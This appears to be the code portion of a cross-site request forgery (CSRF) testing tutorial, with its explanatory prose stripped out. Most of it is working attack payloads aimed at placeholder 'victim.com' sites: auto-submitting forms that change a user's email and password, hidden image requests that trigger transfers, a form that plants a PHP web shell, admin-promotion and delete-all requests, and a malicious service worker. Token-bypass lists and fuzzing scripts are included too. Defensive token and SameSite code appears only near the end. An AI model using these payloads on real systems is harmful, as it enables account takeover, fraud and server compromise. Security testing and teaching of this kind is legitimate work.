// Check for CSRF tokens function detectCSRF() { const forms = document.querySelectorAll(‘form’); forms.forEach(form => { const tokens = form.querySelectorAll(‘[name*=”csrf”], [name*=”token”]’); if (tokens.length === 0) { console.log(‘No CSRF token found:’, form.action); } }); }

// Check SameSite attributes document.cookie.split(‘;’).forEach(cookie => { if (!cookie.includes(‘SameSite’)) { console.log(‘No SameSite protection:’, cookie.trim()); } });

# Burp Suite steps: 1. Right-click request → Generate CSRF PoC 2. Remove CSRF token from request 3. Change request method (POST to GET) 4. Test with different origins 5. Check for custom headers requirement

#!/bin/bash # Test for CSRF tokens curl -s “$URL” | grep -i “csrf\|_token\|authenticity” # Test SameSite cookies curl -I “$URL” | grep -i “samesite”

<html> <body onload=”document.forms[0].submit()”> <form action=”https://victim.com/change-email” method=”POST”> <input type=”hidden” name=”email” value=”[email protected]”> </form> </body> </html>

<img src=”https://bank.com/transfer?to=attacker&amount=5000″ style=”display:none;”> <img src=”https://admin.com/delete-user?id=victim” width=”1″ height=”1″>

fetch(‘https://api.victim.com/change-password’, { method: ‘POST’, credentials: ‘include’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’ }, body: ‘password=hacked123&confirm=hacked123’ });

// Step 1: Change email fetch(‘/change-email’, { method: ‘POST’, credentials: ‘include’, body: ’[email protected]’ }).then(() => { // Step 2: Change password setTimeout(() => { fetch(‘/change-password’, { method: ‘POST’, credentials: ‘include’, body: ‘password=hacked123’ }); }, 2000); });

<form action=”https://victim.com/upload” method=”POST” enctype=”multipart/form-data”> <input type=”hidden” name=”file” value=”shell.php”> <input type=”hidden” name=”content” value=”<?php system($_GET[‘cmd’]); ?>”> </form> <script> const form = document.forms[0]; const formData = new FormData(form); fetch(form.action, {method: ‘POST’, body: formData, credentials: ‘include’}); </script>

const ws = new WebSocket(‘wss://victim.com/admin’); ws.onopen = function() { ws.send(JSON.stringify({ action: ‘delete_all_users’, confirm: true })); };

fetch(‘https://api.victim.com/graphql’, { method: ‘POST’, credentials: ‘include’, headers: {‘Content-Type’: ‘application/json’}, body: JSON.stringify({ query: `mutation { updateUser(id: 1, input: { email: “[email protected]” role: ADMIN }) { id email role } }` }) });

<a href=”bankapp://transfer?amount=1000&to=attacker”> 🎁 Claim Your Prize! </a> <iframe src=”myapp://admin/delete?confirm=true” style=”display:none;”></iframe>

# 1. Remove token completely amount=1000&to=attacker # 2. Empty token value csrf_token=&amount=1000&to=attacker # 3. Use wrong parameter name _token=abc123&amount=1000&to=attacker # 4. Change request method GET /transfer?csrf_token=abc123&amount=1000&to=attacker

<meta name=”referrer” content=”no-referrer”> <iframe src=”data:text/html, <form action=’https://victim.com/transfer’ method=’POST’> <input name=’amount’ value=’1000′> <input name=’to’ value=’attacker’> </form> <script>document.forms[0].submit()</script>”> </iframe>

// Top-level navigation bypass window.open(‘https://victim.com/transfer?amount=1000&to=attacker’, ‘_blank’); // Meta refresh bypass <meta http-equiv=”refresh” content=”0; url=https://victim.com/dangerous-action”>

<form action=”https://api.victim.com/users” method=”POST” enctype=”text/plain”> <input name='{“role”:”admin”,”email”:”[email protected]”,”id”:1,”ignore”:”‘ value='”}’ type=’hidden’> </form>

// Register malicious service worker navigator.serviceWorker.register(‘/malicious-sw.js’); // malicious-sw.js self.addEventListener(‘fetch’, event => { if (event.request.url.includes(‘victim.com’)) { const maliciousRequest = new Request( ‘https://victim.com/admin/delete-all’, {method: ‘POST’, credentials: ‘include’} ); event.respondWith(fetch(maliciousRequest)); } });

const worker = new Worker(‘csrf-worker.js’); worker.postMessage({ target: ‘https://victim.com/api/transfer’, payload: {amount: 10000, to: ‘attacker’} }); // csrf-worker.js self.onmessage = function(e) { const {target, payload} = e.data; fetch(target, { method: ‘POST’, credentials: ‘include’, headers: {‘Content-Type’: ‘application/json’}, body: JSON.stringify(payload) }); };

fetch(‘https://api-gateway.victim.com/user-service/admin/promote’, { method: ‘POST’, credentials: ‘include’, headers: { ‘Content-Type’: ‘application/json’, ‘X-Service’: ‘admin-panel’ }, body: JSON.stringify({ userId: 123, newRole: ‘super-admin’ }) });

fetch(‘https://api.victim.com/lambda/execute’, { method: ‘POST’, credentials: ‘include’, body: JSON.stringify({ function: ‘delete-all-backups’, params: {confirm: true} }) });

<?php session_start(); function generateCSRFToken() { if (empty($_SESSION[‘csrf_token’])) { $_SESSION[‘csrf_token’] = bin2hex(random_bytes(32)); } return $_SESSION[‘csrf_token’]; } function validateCSRFToken($token) { return hash_equals($_SESSION[‘csrf_token’], $token); } // Usage in form echo ‘<input type=”hidden” name=”csrf_token” value=”‘ . generateCSRFToken() . ‘”>’; ?>

const csrf = require(‘csurf’); // CSRF protection middleware const csrfProtection = csrf({ cookie: { httpOnly: true, secure: true, // HTTPS only sameSite: ‘strict’ } }); app.use(csrfProtection); // Provide token to client app.get(‘/csrf-token’, (req, res) => { res.json({csrfToken: req.csrfToken()}); });

# Apache .htaccess Header always edit Set-Cookie ^(.*)$ “$1; SameSite=Strict; Secure” # Nginx proxy_cookie_path / “/; SameSite=Strict; Secure”; # Express.js app.use(session({ secret: ‘your-secret-key’, cookie: { sameSite: ‘strict’, secure: true, httpOnly: true } }));

// Client-side JavaScript function getCSRFToken() { const cookies = document.cookie.split(‘;’); for (let cookie of cookies) { const [name, value] = cookie.trim().split(‘=’); if (name === ‘csrf-token’) return value; } return null; } // Send token in both cookie and header fetch(‘/api/transfer’, { method: ‘POST’, headers: { ‘X-CSRF-Token’: getCSRFToken(), ‘Content-Type’: ‘application/json’ }, credentials: ‘include’, body: JSON.stringify({amount: 100, to: ‘friend’}) });

#!/usr/bin/env python3 import requests class CSRFTester: def __init__(self, target_url, session_cookies): self.target_url = target_url self.session = requests.Session() self.session.cookies.update(session_cookies) def test_csrf_bypass(self, endpoint, params): results = [] # Test 1: Remove CSRF token try: response = self.session.post(endpoint, data=params) results.append({ ‘test’: ‘No CSRF Token’, ‘status’: response.status_code, ‘vulnerable’: response.status_code == 200 }) except Exception as e: results.append({‘test’: ‘No CSRF Token’, ‘error’: str(e)}) return results # Usage cookies = {‘sessionid’: ‘your_session_cookie’} tester = CSRFTester(‘https://target.com’, cookies) results = tester.test_csrf_bypass(‘/transfer’, {‘amount’: ‘1000’})

# Burp Suite CSRF Testing Steps: 1. Proxy traffic through Burp 2. Right-click request → Generate CSRF PoC 3. Modify generated HTML: – Remove CSRF token parameter – Change token value to invalid – Test different request methods 4. Host PoC and test in browser 5. Use Intruder for token fuzzing: – Sniper attack on token parameter – Payload list with common bypasses

# ZAP API for CSRF testing curl -X GET “http://localhost:8080/JSON/ascan/action/scan/” \ -d “url=https://target.com” \ -d “recurse=true” # Generate CSRF test cases curl -X GET “http://localhost:8080/JSON/core/action/sendRequest/” \ -d “request=POST /transfer HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded amount=1000&to=attacker”

#!/usr/bin/env python3 import requests import itertools class CSRFFuzzer: def __init__(self, base_url, session_cookies): self.base_url = base_url self.session = requests.Session() self.session.cookies.update(session_cookies) def fuzz_endpoint(self, endpoint, original_params): bypass_attempts = [ {}, # No token {‘csrf_token’: ”}, # Empty token {‘csrf_token’: ‘invalid’}, # Invalid token {‘_token’: original_params.get(‘csrf_token’, ”)}, # Wrong name ] results = [] for params in bypass_attempts: test_params = original_params.copy() test_params.update(params) try: response = self.session.post(endpoint, data=test_params) results.append({ ‘params’: params, ‘status’: response.status_code, ‘vulnerable’: response.status_code in [200, 302] }) except Exception as e: results.append({‘params’: params, ‘error’: str(e)}) return results